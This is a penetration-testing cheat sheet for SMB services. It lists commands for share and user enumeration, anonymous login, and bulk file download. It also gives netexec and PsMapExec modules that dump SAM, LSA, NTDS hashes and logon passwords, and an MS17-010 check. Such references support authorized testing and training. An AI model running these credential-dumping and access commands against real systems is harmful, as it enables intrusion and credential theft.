# 139, 445 - SMB

### Enumeration <a href="#enumeration" id="enumeration"></a>

* Identify SMB running on a host. List only the open ports (the UDP probe for 137/138 needs root, hence `sudo`).

```bash
sudo nmap -sT -sU -sV -p135,137,138,139,445 --open <IP>
```

### Nmap Scripts <a href="#nmap-scripts" id="nmap-scripts"></a>

```bash
# Enumerate shares
nmap --script smb-enum-shares -p 445 <IP>
# OS Discovery
nmap --script smb-os-discovery -p 445 <IP>
# Enumerate Users
nmap --script=smb-enum-users -p 445 <IP>
# All
nmap --script=smb-enum-users,smb-enum-shares,smb-os-discovery -p 139,445 <IP>
```

### NULL / Anonymous Login <a href="#null-anonymous-login" id="null-anonymous-login"></a>

```bash
# Without '-N' smbclient prompts for a password; on some configurations pressing Enter at the prompt (empty password) is accepted.
smbclient -U '' -L \\\\<IP> 

smbclient -U '' -N -L \\\\<IP> 
smbclient -U '%' -N -L \\\\<IP>
smbclient -U '%' -N \\\\<IP>\\<Folder>

# Use an arbitrary username with an empty password to test for guest/anonymous access.
crackmapexec smb <IP> -u 'anonymous' -p ''

crackmapexec smb <IP> -u '' -p ''
crackmapexec smb <IP> -u '' -p '' --shares
```

### Authenticated <a href="#authenticated" id="authenticated"></a>

```bash
# smbmap, list shares and view permissions
smbmap -H <IP> -u <User> -p <Password>

# Connect to share as user and prompt for password
smbclient -U <User> \\\\<IP>\\<Share>
```

### Download Files <a href="#download-files" id="download-files"></a>

```bash
# Grab everything in a share
smbclient '\\<IP>\<Share>' -N -c 'prompt OFF;recurse ON; mget *'

# Recursive pattern search for candidate files to download
smbmap -H <IP> -u <User> -p <Password> -d <Domain> -R -A "pass*" --depth 20  
smbmap -H <IP> -u <User> -p <Password> -d <Domain> -R -A ".txt|.log|.ps1|.vbs|.zip|.xml"
```

### Tools <a href="#tools" id="tools"></a>

#### Enum4Linux <a href="#enum4linux" id="enum4linux"></a>

```bash
enum4linux -a -u '' -p '' <IP>
```

#### NetExec <a href="#crackmapexec" id="crackmapexec"></a>

* Command execution and enumeration from Linux
* <https://www.netexec.wiki/smb-protocol/enumeration>

```bash
nxc smb <IP> -u <User> -p <Password> --shares
nxc smb <IP> -u <User> -p <Password> --users
nxc smb <IP> -u <User> -p <Password> --users-export output.txt
nxc smb <IP> -u <User> -p <Password> --loggedon-users
nxc smb <IP> -u <User> -p <Password> --pass-pol
nxc smb <IP> -u <User> -p <Password> --rid-brute
nxc smb <IP> -u <User> -p <Password> --sam
nxc smb <IP> -u <User> -p <Password> --lsa
nxc smb <IP> -u <User> -p <Password> --ntds
```

#### PsMapExec <a href="#psmapexec" id="psmapexec"></a>

* Command execution and enumeration from Windows

```bash
PsMapExec -Method SMB -Targets [IP] -Username [User] -Password [Pass] -Module Disks
PsMapExec -Method SMB -Targets [IP] -Username [User] -Password [Pass] -Module KerbDump
PsMapExec -Method SMB -Targets [IP] -Username [User] -Password [Pass] -Module LSA
PsMapExec -Method SMB -Targets [IP] -Username [User] -Password [Pass] -Module LogonPasswords
PsMapExec -Method SMB -Targets [IP] -Username [User] -Password [Pass] -Module NTDS
PsMapExec -Method SMB -Targets [IP] -Username [User] -Password [Pass] -Module SAM
PsMapExec -Method SMB -Targets [IP] -Username [User] -Password [Pass] -Module Sessions
```

### User Enumeration <a href="#user-enumeration" id="user-enumeration"></a>

#### Nmap <a href="#nmap" id="nmap"></a>

```bash
# Nmap
nmap --script=smb-enum-users -p 445 <IP>

# Metasploit
use auxiliary/scanner/smb/smb_enumusers

# Crackmapexec
crackmapexec smb <IP> -u '' -p '' --users --rid-brute | grep '(SidTypeUser)'

# Enum4Linux
enum4linux -u '' -p '' -r <IP> | grep "Local User"
enum4linux -u '' -p '' -r <IP> | grep "Local Group"
```

### Exploits <a href="#exploits" id="exploits"></a>

```bash
nmap --script smb-vuln-ms17-010 -p 445 <IP>
```

